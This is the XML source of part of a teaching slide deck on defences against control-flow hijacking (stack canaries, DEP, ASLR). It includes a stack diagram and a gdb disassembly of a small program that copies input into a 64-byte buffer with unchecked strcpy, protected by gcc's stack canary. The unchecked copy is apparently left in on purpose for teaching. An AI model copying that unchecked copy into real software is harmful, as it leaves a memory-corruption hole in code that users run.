      <a:lvl2pPr marL="635000" indent="-292100" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="914400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="–"/>
        <a:tabLst/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1320800" indent="-177800" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="»"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>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1.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag131.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tags" Target="../tags/tag140.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tags" Target="../tags/tag14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tags" Target="../tags/tag14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ags" Target="../tags/tag143.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hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa290051(v=vs.71).aspx" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag144.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tags" Target="../tags/tag145.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag146.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147.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tags" Target="../tags/tag148.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149.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tags" Target="../tags/tag132.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150.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151.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.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tags" Target="../tags/tag152.xml"/><Relationship Id="rId2"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4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag153.x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tags" Target="../tags/tag154.x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tags" Target="../tags/tag155.x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tags" Target="../tags/tag156.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tags" Target="../tags/tag157.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tags" Target="../tags/tag158.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId3"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tags" Target="../tags/tag159.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tags" Target="../tags/tag133.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tags" Target="../tags/tag160.x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tags" Target="../tags/tag161.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tags" Target="../tags/tag162.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33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag163.x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tags" Target="../tags/tag164.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7.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag165.x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tags" Target="../tags/tag166.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9.emf"/><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tags" Target="../tags/tag167.x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tags" Target="../tags/tag168.x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tags" Target="../tags/tag169.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4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag134.x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image" Target="../media/image12.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag170.x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image" Target="../media/image14.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag171.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag172.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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image" Target="../media/image15.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag173.xml"/><Relationship Id="rId2"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image" Target="../media/image16.emf"/><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tags" Target="../tags/tag174.x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tags" Target="../tags/tag175.x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tags" Target="../tags/tag176.x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tags" Target="../tags/tag177.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag178.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag179.xml"/><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tags" Target="../tags/tag135.x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tags" Target="../tags/tag180.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81.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag182.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag183.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag184.x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tags" Target="../tags/tag185.x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tags" Target="../tags/tag186.x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tags" Target="../tags/tag187.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag188.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2.jpeg"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag136.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag189.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tags" Target="../tags/tag190.xml"/><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tags" Target="../tags/tag137.x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tags" Target="../tags/tag138.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tags" Target="../tags/tag139.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752600" y="2882471"/>
            <a:ext cx="6400800" cy="654313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Control Flow Hijack Defenses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Canaries, DEP, and ASLR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2564880"/>
            <a:ext cx="45719" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="252308" y="2730851"/>
            <a:ext cx="1083329" cy="1115858"/>
            <a:chOff x="252308" y="2855212"/>
            <a:chExt cx="1083329" cy="1115858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="CYBERSTAKES_LOGO_Black-djb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955" y="2855212"/>
              <a:ext cx="768035" cy="867136"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="TextBox 1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="252308" y="3724849"/>
              <a:ext cx="1083329" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                <a:t>CyberStakes</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="3593068"/>
            <a:ext cx="2821285" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Educate the Educator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390025629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p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="579517050"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7315200" y="2595040"/>
          <a:ext cx="1461558" cy="3348560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ebp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CANARY</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> bytes)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5015394"/>
            <a:ext cx="6400800" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009446"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2362200"/>
            <a:ext cx="6400800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>tack-Smashing Protector (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>ProPolice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="8382000" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>of assembler code for function main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048440 &lt;+0&gt;:	push   %ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048441 &lt;+1&gt;:	mov    %esp,%ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048443 &lt;+3&gt;:	sub    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$76,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048446 &lt;+6&gt;:	mov    %gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:20,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x0804844c &lt;+12&gt;:	mov    %eax,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(%ebp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x0804844f &lt;+15&gt;:	xor    %eax,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048451 &lt;+17&gt;:	mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>12(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%ebp),%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048454 &lt;+20&gt;:	mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(%eax),%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048457 &lt;+23&gt;:	mov    %eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(%esp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x0804845b &lt;+27&gt;:	lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-68(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%ebp),%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x0804845e &lt;+30&gt;:	mov    %eax,(%esp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048461 &lt;+33&gt;:	call   0x8048350 &lt;strcpy@plt&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048466 &lt;+38&gt;:	mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(%ebp),%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048469 &lt;+41&gt;:	xor    %gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:20,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048470 &lt;+48&gt;:	je     0x8048477 &lt;main+55&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048472 &lt;+50&gt;:	call   0x8048340 &lt;__stack_chk_fail@plt&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048477 &lt;+55&gt;:	leave  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048478 &lt;+56&gt;:	ret    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="sk-SK" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69342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47839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5456490" y="1411069"/>
            <a:ext cx="3611310" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
